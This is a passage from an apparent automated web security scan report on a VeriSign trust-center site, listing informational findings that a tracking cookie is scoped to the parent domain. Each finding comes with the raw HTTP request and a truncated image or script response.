GET /rcm/verisign/images/logo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 16073 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..=..................................................................................................................................................................................................[SNIP]...
9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/popup_button_left.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 348 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/popup_button_right.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 344 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/pricebox_bg.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 13169 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.......................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46...[SNIP]...
9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 597 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a . .....Bv...!..NETSCAPE2.0.....!.. ....,.... . ......h.i.X.oU...m. ..!.. ....,...... ......y........2.M.Z..!.. ....,...... .....b.x...bS.. .!.. ....,...... ...........s.M. .!.. ....,...... .......[SNIP]...
9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/truste.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/truste.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2232 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89aD.T..........utt..<q.7...?<<..p..<......'#$La+.........TQR..Tfff........+......+."HEFa.1.................1......BQ'..c333..K..B......" }.&_]]..8................+,...6<%...Up.........3..?..E..0....[SNIP]...
9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermArrow.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 71 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.............!.......,.............i.....0...U......t$b.G..c.%..;
9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermBgM.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 956 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ ..................C....... .. .......................................................'......................................[SNIP]...
9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermWtB.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 978 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermWtT.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 997 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/tsTermWtT.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: ApacheSet-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 876 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ .....................(............................... ...2......................U..........!"6AGu....123q.........?..Y...x.zWG...[SNIP]...
9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/webtrust.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/webtrust.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: ApacheSet-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2221 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..C...................................................................................................z.....f..O..3........3...f..}..3......r .f..ffff.ff.fffKa.3f.3ffWY_2PwCDL33.33f333(0I.3..3f....[SNIP]...
9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/scripts/account_signin.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/account_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; 